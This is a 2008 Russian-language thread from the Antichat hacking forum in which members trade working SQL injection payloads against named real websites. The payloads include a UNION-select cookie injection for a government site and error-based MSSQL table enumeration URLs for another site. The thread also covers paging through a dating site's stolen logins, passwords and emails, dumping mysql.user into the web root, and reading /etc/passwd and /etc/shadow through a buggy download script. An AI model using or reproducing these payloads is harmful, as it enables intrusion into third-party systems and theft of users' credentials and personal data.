HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.04.2008, 20:07
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

Цитата:
Сообщение от Indio  
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?

К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?

Спасибо всем ответившим =)
Пользуйся лимитом (LIMIT 20000,100) к примеру
 
Ответить с цитированием

  #2  
Старый 30.04.2008, 20:05
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3  
Старый 30.04.2008, 20:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Indio какая СУБД интересует?
MSSQL: select TOP n column from table where column>'чето'
MYSQL: select column from table limit 20000,10
SYBASE: select TOP n START AT 20000 column from table
PostgreSQL: select column from table LIMIT 10 OFFSET 20000
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #4  
Старый 30.04.2008, 22:23
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Со скулей походу ниче не вышло,аблом =_=

Вот второй день уже маюсь,дошёл вот :

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+ information_schema.tables+where+table_name+not+in+ (0x276C6F67696E27,0x27647470726F7065727469657327))--

Почему дальше не идёт,не ужели всего две таблицы ?))

Последний раз редактировалось Велемир; 30.04.2008 в 22:32..
 
Ответить с цитированием

  #5  
Старый 30.04.2008, 22:52
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Код:
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+1+table_name+from+information_schema.tables)))--
Код:
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+2+table_name+from+information_schema.tables)))--
меняй число после top во втором подзапросе (который внутри where+table_name+not+in)
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #6  
Старый 01.05.2008, 00:19
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Пасип те большое))).И откуда ты только эти подзапросы откопал:Р
 
Ответить с цитированием

  #7  
Старый 01.05.2008, 00:31
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

из манов, которые тебе давно пора начать читать
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #8  
Старый 01.05.2008, 15:55
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Я прочитал почти всё что только можно прочитать: (и маны читал по сто раз
 
Ответить с цитированием

  #9  
Старый 02.05.2008, 14:36
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>

Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(те ст+using+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs \\rail\\1.txt"/*

Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???
 
Ответить с цитированием

  #10  
Старый 02.05.2008, 21:03
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
С нами: 9674246

Репутация: 316


По умолчанию

нашел на сатйте бажный скрипт даунлоада фалов
скачал /etc/passwd все прошло норм
поробовал /etc/shadow
а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.